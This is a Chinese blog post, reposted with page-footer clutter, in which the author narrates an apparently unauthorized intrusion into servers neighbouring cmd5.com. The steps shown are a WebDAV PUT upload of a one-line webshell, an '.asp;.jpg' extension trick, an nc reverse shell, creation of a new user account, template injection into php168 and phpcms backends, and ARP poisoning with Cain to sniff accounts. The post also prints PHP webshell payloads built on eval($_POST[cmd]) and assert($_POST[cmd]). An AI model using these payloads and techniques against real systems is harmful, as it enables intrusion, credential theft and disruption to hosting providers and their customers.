对CMD5.COM的攻击实战

作者:BlAck.Eagle

声明:本文为作者初学信息安全时的测试文档,严禁通过按照本文技术进行攻击等非法活动,后果自负!

提起cmd5.com,估计安全圈子的朋友都很熟悉,笔者也非常厌烦它现在的盈利模式,比较简单的英文字母,现在也都成了收费的,于是萌发了这个邪恶的想法。

每次做测试的时候,笔者一般都构思下流程,这次也不例外,这种网站一般还是需要从嗅探入手,笔者准备首先利用Zwell的IIS put Scanner简单的扫描下目标网段的web服务器结构,因为它能帮助我们把很多有用的banner都扫描出来。

14130617_IRES.jpg
笔 者通过扫描,发现存在了PUT为On的一个IP,很多时候存在PUT为yes,但是上传失败,可能是webdav被禁用或者目录没有写权限。然后利用老兵 的iiswrite工具写入一句话马,写入成功,然后通过“MOVE”来改为ASP格式,但是这时候经常出错,最后只有改为.asp;.jpg这种格式才 逃脱杀软的毒手。然后通过一句话客户端,上传了很多次都是服务器500错误,木马被杀,最后通过消灭和Psjj兄弟提供的webshell,成功。

14130617_bM3c.jpg
简单看了下权限,还算比较大,通过webshell的下载功能上传了cmd,提权大杀器pr,nc。通过NC反弹到本地并且添加了一个用户,顺利添加了账户。并且成功登陆服务器。

14130618_nViK.jpg
到达服务器一般是先把服务器的洞子给补上,首先将“Web服务扩展”中的WebDAV给禁止,然后将网站属性,主目录的写入给去掉就可以了!

14130618_wp6T.jpg
这 时候,笔者才回过头来看目标站点,首先是简单ping了下cmd5.com的站点,无法ping通,然后通过ipconfig/all看了下子网掩码,发 现子网掩码是255.255.255.128,哎,真的失望了,和目标不在一个网段,但是接下来,目标更加清晰了,只用到125.254.44.126去 渗透一台服务器就好了,不出意外就会跟目标是同一个网段。

14130618_GUN1.jpg
说 干就干,和朋友饮恨操刀上了,这时候在目标2xx网段,利用简单社工的账户进入了某php168后台,这里需要说明的是,该php168系统已经是最新版 本,通过模板那里直接添加大马已经不行,写入马后,就会马上被清了,然后笔者想到了select into这种方法,但是也失败了,提示信息是服务器拒绝这个普通的mysql账户。

14130618_obNC.jpg

14130619_Nsn7.jpg
折腾了很久没办法,在好友Robert的提醒下,笔者打算通过添加一个普通的模板文件,
Template/default/none.htm,通过写入
<script language="php">phpinfo()</script>
tested by black.eagle
这种文件,然后再“系统设置”-“网站首页设置”,点击提交,然后把首页生成静态页

14130619_X0sY.jpg

14130619_Nt48.jpg
大家可以看到oo.php确实已经执行了,但是笔者在none.htm,写为
<script language="php">
fputs(fopen("horind.php","w"),"<?eval(\$_POST[cmd]);?>")
</script>
tested by black.eagle
的话,eval被过滤为了eva l写为下面这种格式的话,确实写入了,但是无法通过一句话马的客户端“专家模式”来执行
<script language="php">assert($_POST[cmd])</script>
tested by black.eagle

14130620_cJ8X.jpg
至此告一段落,然后在寻寻觅觅中拾得一PHPCMS后台,这个后台也没少了瞎折腾,虽说phpcms拿webshell简单,这里无法执行sql,给管理禁用了,然后通过
admin.php?mod=phpcms&file=safe&action=see_code&files=eagle.php这种格式,由于写入种
种小马的原因没有成功,也希望各位看官以后直接上大马。

14130620_6Z1j.jpg
拿到了webshell,并且这管理的疏忽,系统权限到手!

14130620_Sk3n.jpg
看了下子网掩码,和cmd5.com同网段,好男儿,操刀上了!判断了网关,为.129,ping和tracert对方的IP都不通,看来有防火墙,ARP防火墙不好突破,那么只有稍微改变下cain的发包间隔,即毒化远程ARP缓存每隔19秒,默认的是30秒!

14130620_Fr0b.jpg
确实也嗅探了一些账号。

14130620_s6Jo.jpg
只不过,嗅探了一会机器就挂掉了,ping的时候说是目标网段不可达,笔者只能等到第二天,那么只能让IDC的客服帮我们重启下了啊,虽说是知道了,长城宽带的机房,但是不知道是哪个IDC啊,没办法,笔者先找了个该网段的站点,加了他们站长聊了下,成功获取信息。

14130621_KhOG.jpg

14130621_3M2J.jpg
然后通过上述获知的客服QQ,又联系上了负责该服务器的客服,等了差不多10分钟,机器就启动了,ping的时候也能通了,谢谢客服姐姐们的工作态度,此致敬礼!

14130621_chkB.jpg

14130621_u753.jpg

等了些时候,获取了shell,也隐约感觉到目标可能做了CDN,因为IP变动很大。

14130622_WGBS.jpg

转载于:https://my.oschina.net/chinahermit/blog/102016

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值